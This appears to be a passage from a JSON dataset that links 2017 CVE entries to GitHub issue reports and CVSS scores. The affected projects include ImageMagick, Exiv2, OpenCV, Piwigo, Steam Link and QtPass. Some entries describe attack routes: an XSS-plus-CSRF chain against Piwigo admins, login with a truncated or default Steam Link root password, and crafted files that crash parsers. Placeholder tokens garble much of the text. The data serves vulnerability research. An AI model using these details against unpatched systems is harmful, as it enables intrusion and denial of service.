fffffffd8a NUMBERTAG f7fe NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [rax]) R NUMBERTAG R NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG ERRORTAG R NUMBERTAG e ('^') R NUMBERTAG R NUMBERTAG ffff NUMBERTAG a2ac NUMBERTAG ASCII') R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov edx,DWORD PTR [rbp NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov rax,QWORD PTR [rbp NUMBERTAG b NUMBERTAG ffff NUMBERTAG bf3e APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG add rax,rd NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [ra NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG cmp al NUMBERTAG c NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG jne NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG add DWORD PTR [rbp NUMBERTAG bc NUMBERTAG ffff NUMBERTAG bf4f APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov edx,DWORD PTR [rbp NUMBERTAG bc] [ stack NUMBERTAG fffffffd8a NUMBERTAG f7fe NUMBERTAG fffffffd8a NUMBERTAG fffffffd8b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG ERRORTAG NUMBERTAG fffffffd8b NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG e NUMBERTAG ffff NUMBERTAG afb0 APITAG mov rax,QWORD PTR [rip NUMBERTAG d NUMBERTAG ffff NUMBERTAG cb NUMBERTAG fffffffd8c NUMBERTAG fffffffd8c NUMBERTAG ff0f6d NUMBERTAG fffffffd8d NUMBERTAG d NUMBERTAG b0c NUMBERTAG fffffffd8d NUMBERTAG ffffbad NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG bf NUMBERTAG in APITAG (out=..., bytes NUMBERTAG d NUMBERTAG I PATHTAG size NUMBERTAG depth NUMBERTAG at APITAG NUMBERTAG while ( i APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at libc APITAG NUMBERTAG dee9 in _start () ================== the pocs please refer to : URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17725",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/188",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/188",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2017-12-12T14:27:30Z",
        "description": "exi NUMBERTAG library: heap buffer overflow in APITAG APITAG Description on exi NUMBERTAG the latest version): there is a heap based buffer overflow in the APITAG function APITAG which can be triggered by crafted tiff file. Note that this vulnerability is different from CVETAG (issue NUMBERTAG which is a an invalid memory address dereference. PATHTAG APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG f NUMBERTAG f NUMBERTAG de bp NUMBERTAG ffee NUMBERTAG c NUMBERTAG sp NUMBERTAG ffee NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG f NUMBERTAG f NUMBERTAG dd in APITAG char const , APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG d2c in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e2e7 in APITAG std::char_traits APITAG , std::allocator APITAG > const&) PATHTAG NUMBERTAG c NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG cd NUMBERTAG in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG faed6b2 in operator APITAG long) ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG char const , APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING APITAG APITAG FILETAG Author Credit to Wei You, please contact EMAILTAG for more details.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17760",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/10351",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/10351",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2017-12-19T11:26:43Z",
        "description": "Buffer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Detailed description A buffer overflow occurs in function APITAG in file APITAG . The crash details as follows: ERRORTAG Steps to reproduce Please refer to the following url for the testcases: URLTAG url",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17774",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/822",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/822",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-12-17T16:44:07Z",
        "description": "vulnerability\uff1ause xss+csrf attack to control the admin panel. Well, sir , I just found some vulnerabilities in Piwigo NUMBERTAG I'll show you the details here. First, the admin panel left no csrf protect\uff0cthen we can pishing the admin to vist a webpage in evil site, which contain csrf attack content. Because of some xss vulnerabilities in the admin panel, we can combine xss and csrf successfully. For example, we get a webpage here , which left an stored xss vulnerability. APITAG When the admin user was cheated to visit the evil page url\uff1a APITAG Now the admin user suffered a csrf attack , and writed evil xss content into the site APITAG by himself. The evil poc APITAG will be like this: CODETAG Then we've attacked the admin user by xss successfully, without trying to login by ourself . Altogether\uff0c we should filter the evil character at output points, even in the admin panel . And adding csrf token to important operation in the admin panel is also necessary, because it may cause something more seriously at other points. FILETAG FILETAG Wish your response , sir~",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17792",
        "Issue_Url_old": "https://github.com/BlogoText/blogotext/issues/345",
        "Issue_Url_new": "https://github.com/blogotext/blogotext/issues/345",
        "Repo_new": "blogotext/blogotext",
        "Issue_Created_At": "2017-11-17T02:02:14Z",
        "description": "some vulns found in version NUMBERTAG I have found some vulns in version NUMBERTAG Is there some more private, more security way to contact with you? like a email or so.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17822",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/823",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/823",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-12-18T12:57:57Z",
        "description": "SQL injection in admin/users. By using field APITAG you can inject unexpected content to the database. This security issue is not \"critical\" because it requires access to administration, but should be fixed anyway.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2017-17823",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/826",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/826",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-12-18T16:09:04Z",
        "description": "SQL injection in configuration setting. The configuration setting \"order by\" can receive an SQL injection. This vulnerability is not considered as critical because it requires admin access to be exploited.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2017-17824",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/825",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/825",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-12-18T15:43:58Z",
        "description": "SQL injection on Batch Manager, unit mode. The Batch Manager has a SQL injection vulnerability. The bug is not critical because it requires administration access to be exploited, but needs to be fixed anyway.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2017-17877",
        "Issue_Url_old": "https://github.com/ValveSoftware/steamlink-sdk/issues/119",
        "Issue_Url_new": "https://github.com/valvesoftware/steamlink-sdk/issues/119",
        "Repo_new": "ValveSoftware/steamlink-sdk",
        "Issue_Created_At": "2017-12-23T23:24:22Z",
        "description": "IP NUMBERTAG Firewall Needed. Given that NUMBERTAG silently truncates passwords to NUMBERTAG characters, having SSHD bind to all IP addresses isn't a great idea. This isn't much of a risk with most home networks due to IP NUMBERTAG NAT ( URLTAG but those with IP NUMBERTAG will end up having their Steam Link accessible on the internet if there's no incoming firewall. FILETAG We really do need iptables / ip6tables. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17878",
        "Issue_Url_old": "https://github.com/ValveSoftware/steamlink-sdk/issues/110",
        "Issue_Url_new": "https://github.com/valvesoftware/steamlink-sdk/issues/110",
        "Repo_new": "ValveSoftware/steamlink-sdk",
        "Issue_Created_At": "2017-11-05T15:06:49Z",
        "description": "Only first NUMBERTAG characters of password are checked. Only first NUMBERTAG chars of password are checked for validity when connecting over ssh. Reproduce NUMBERTAG ssh to steamlink NUMBERTAG for defaultpassword 'steamlin' is sufficient NUMBERTAG change password with 'passwd' to a long password over NUMBERTAG chars. (e.g NUMBERTAG log out NUMBERTAG login with first NUMBERTAG characters of new password and any arbitrary characters after that. (e.g NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17878",
        "Issue_Url_old": "https://github.com/ValveSoftware/steamlink-sdk/issues/101",
        "Issue_Url_new": "https://github.com/valvesoftware/steamlink-sdk/issues/101",
        "Repo_new": "ValveSoftware/steamlink-sdk",
        "Issue_Created_At": "2017-08-12T09:05:29Z",
        "description": "Default root password is not steamlink NUMBERTAG The default root password when enabling and connecting to the Steam Link with ssh is not \"steamlink NUMBERTAG it is \"steamlin\". Please change this is in the documentation, or change the password.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17879",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/906",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/906",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-12-21T07:57:04Z",
        "description": "heap buffer overflow in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert heap buffer overflow APITAG /dev/null ERRORTAG tesecase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17880",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/907",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/907",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-12-21T08:52:20Z",
        "description": "stack buffer overflow in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert stack buffer overflow NUMBERTAG dev/null ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17881",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/878",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/878",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-11-24T05:58:35Z",
        "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17882",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/880",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/880",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-11-24T06:17:05Z",
        "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17883",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/877",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/877",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-11-24T05:49:54Z",
        "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase\uff1a URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17884",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/902",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/902",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-12-19T07:22:34Z",
        "description": "memory leaks in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert 'memory leaks APITAG /dev/null ERRORTAG testcase: FILETAG ~",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17885",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/879",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/879",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-11-24T06:05:28Z",
        "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17886",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/874",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/874",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-11-23T01:41:28Z",
        "description": "memory leaks in APITAG $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leaks /dev/null ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17887",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/903",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/903",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-12-19T07:29:18Z",
        "description": "memory leaks in APITAG PATHTAG version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib Trigger Command: magick convert memory leaks APITAG /dev/null ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17914",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/908",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/908",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-12-22T02:21:06Z",
        "description": "CPU and Memory exhaustion. Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU and Memory consumption. (CPU NUMBERTAG Memory NUMBERTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib The FILETAG is as following CODETAG Trigger Command: magick convert ./cpu memory exhaustion mng /dev/null Be careful, please monitor the memory percentage, I had to reboot my computer a few minutes ago. Debug When debug we found the program is always in a while loop APITAG ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17934",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/920",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/920",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-12-26T07:56:41Z",
        "description": "memory leaks in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib magick convert Memory Leak APITAG NUMBERTAG msl ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17971",
        "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/8000",
        "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/8000",
        "Repo_new": "dolibarr/dolibarr",
        "Issue_Created_At": "2017-12-29T14:19:38Z",
        "description": "XSS by using \"onclick\". Bug FILETAG FILETAG Fix Add the \"onclick\"\u3001\"onscroll\" in the black list, and escape the \"<\",etc.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18005",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/168",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/168",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2017-11-18T22:24:23Z",
        "description": "NULL Pointer Dereference while extracting metadata of a malformed tiff. There's a NULL Pointer Dereference occurring during the metadata extraction from a malformed tiff file. This can be triggered by running APITAG on the test case, FILETAG . The hexdump of the test case is: CODETAG The relevant ASAN output is: ERRORTAG It looks like the NULL Pointer Dereference is being triggered by a NUMBERTAG alue which is being used in the APITAG function in the value of n , which is being dereferenced in APITAG This is indicated by the GDB backtrace: CODETAG Debug info: Exi NUMBERTAG ersion NUMBERTAG a NUMBERTAG bit build) Compiler: gcc NUMBERTAG clang NUMBERTAG OS: Ubuntu NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-18008",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/921",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/921",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-12-27T01:42:51Z",
        "description": "memory leaks in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib magick convert Memory Leak APITAG /dev/null ERRORTAG test case: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18009",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/10479",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/10479",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2018-01-01T03:37:50Z",
        "description": "Buffer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Detailed description Detailed description A buffer overflow occurs in function APITAG in file PATHTAG The crash details as follows: ERRORTAG Steps to reproduce Please refer to the following url for the testcases: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18021",
        "Issue_Url_old": "https://github.com/IJHack/QtPass/issues/338",
        "Issue_Url_new": "https://github.com/ijhack/qtpass/issues/338",
        "Repo_new": "ijhack/qtpass",
        "Issue_Created_At": "2017-12-22T16:41:17Z",
        "description": "Insecure Password Generation. The current way of generating passwords is insecure. All passwords that have been generated with APITAG in the past must be regenerated and changed. Here is the current password generation function: CODETAG The problem here is that module will not uniformly distribute that set. The proper way to do things is to just throw away values that are out of bounds. You _could_ try to do the calculation correctly to uniformly stretch or compress, but it's hard to get right, so it's best to just discard numbers outside the set and try again. Secondly, and more critically, here is the implementation of APITAG : CODETAG Unfortunately, using a non cryptographically secure random number generator like libc's APITAG is problematic future outputs can be derived from knowing only a handful of past outputs and seeding that deterministic rng with APITAG is even more dangerous. Not only is the current time a guessable/bruteforcable parameter, but the documentation for APITAG actually indicates that this is merely the \" the millisecond part NUMBERTAG to NUMBERTAG of the time URLTAG \", which means there are only NUMBERTAG possibilities of generated sequences of passwords. This is as bad as it gets, in terms of password manager key generation. The proper fix is to use Qt NUMBERTAG s APITAG URLTAG . If NUMBERTAG is not available to you, use APITAG on APITAG and APITAG on Windows URLTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18022",
